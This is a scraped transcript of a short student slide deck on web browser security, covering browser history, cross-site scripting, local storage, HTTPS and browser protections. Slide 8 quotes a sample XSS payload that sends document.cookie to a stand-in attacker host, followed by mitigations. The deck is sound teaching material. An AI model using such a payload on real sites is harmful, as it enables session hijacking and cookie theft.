Presentation is loading. Please wait.

Presentation is loading. Please wait.

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.

Published byMattie Donaway Modified over 9 years ago

Similar presentations

Presentation on theme: "WEB BROWSER SECURITY By Robert Sellers Brian Bauer."— Presentation transcript:

1 WEB BROWSER SECURITY By Robert Sellers Brian Bauer

2 INTRODUCTION Relevance  Use Internet daily  Transmit personal information, needs to be secure Content 1.History 2.Security Issues and Mitigation 3.Protection

3 HISTORY First ever browser – WorldWideWeb (1990) o Created at CERN by Tim Berners-Lee o Used internally, no real security threats o Would only display HTML text o Allowed downloading of other file types

4 HISTORY Mosaic (1993) o First browser with a GUI o Lead to increase in Internet popularity Netscape Navigator (1994) o Nearly disappeared by 2000 Internet Explorer (1995) o Held as much as 95% of the market

5 HISTORY Safari (2003) o Apple’s browser Firefox (2004) o Open source Chrome (2008) o Rapid increase in market share

6 SECURITY ISSUES Increase in security issues o Complexity of web sites and browsers o Size of the Internet o Anyone can access Uses of Internet o Online banking o Shopping o More sharing of sensitive data

7 SECURITY ISSUES Cross Site Scripting (XSS) o Takes advantage of complex, dynamic web pages o Injects client side scripts, HTML o Can lead to cookie theft, browser redirection, untrusted content o Nearly 80% of vulnerabilities in 2007 (Symantec)

8 SECURITY ISSUES Example http://portal.example/index.php?sessionid=12312312& username= document.location='http://attackerhost.example/cgi-bin/ cookiesteal.cgi?'+document.cookie source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting XSS Mitigation  Disable scripting  Sanitize input, escape HTML/scripts  No script access to cookies

9 SECURITY ISSUES Local Storage o Form data o Login credentials Encryption - HTTP vs HTTPS o Packet sniffing -> session hijacking, password stealing

10 PROTECTING YOURSELF ONLINE Incognito Mode (Google Chrome)  Allows user to switch between multiple privacy settings with the click of a button  Can be activated in one window/tab but not others Browser Guards o Modern browsers will prevent users from visiting malicious sites o Two main methods  List of reported malicious sites  Algorithm to detect malicious code on a site o This can protect from viruses, phishing, and other threats

11 CONCLUSION Browsers can only do so much Much security is responsibility of web designers Internet users should be aware of issues

Download ppt "WEB BROWSER SECURITY By Robert Sellers Brian Bauer."

Similar presentations

Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
Web browsers It’s a software application for retrieving and presenting information on WWW. An information resource is identified by a Uniform Resource.

Web browsers It’s a software application for retrieving and presenting information on WWW. An information resource is identified by a Uniform Resource.
HTTPS Hypertext Transfer Protocol Secure Marcela López Hurtado.

HTTPS Hypertext Transfer Protocol Secure Marcela López Hurtado.
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
Chapter 7: The Web and E-mail1 The Web and E-mail Chapter 7.

Chapter 7: The Web and 1 The Web and Chapter 7.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Chapter 4 Application Security Knowledge and Test Prep

Chapter 4 Application Security Knowledge and Test Prep
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.
WEB BROWSERS. W EB B ROWSER B ASICS Define: a software application for retrieving, presenting, and traversing information resources on the World Wide.

WEB BROWSERS. W EB B ROWSER B ASICS Define: a software application for retrieving, presenting, and traversing information resources on the World Wide.
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.

 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
Google Chrome Hava Bresler Freidenreich Computers and Education Rutgers University, Fall 2008.

Google Chrome Hava Bresler Freidenreich Computers and Education Rutgers University, Fall 2008.
Computer Concepts 2014 Chapter 7 The Web and E-mail.

Computer Concepts 2014 Chapter 7 The Web and .
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
Computer and Information Security Protecting yourself and your clients in the wild and wooly online world.

Computer and Information Security Protecting yourself and your clients in the wild and wooly online world.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.
Safe Computing. Computer Maintenance  Back up, Back up, Back up  External Hard Drive  CDs or DVDs  Disk Defragmenter  Reallocates files so they use.

Safe Computing. Computer Maintenance  Back up, Back up, Back up  External Hard Drive  CDs or DVDs  Disk Defragmenter  Reallocates files so they use.
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.

1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.

Similar presentations

Ads by Google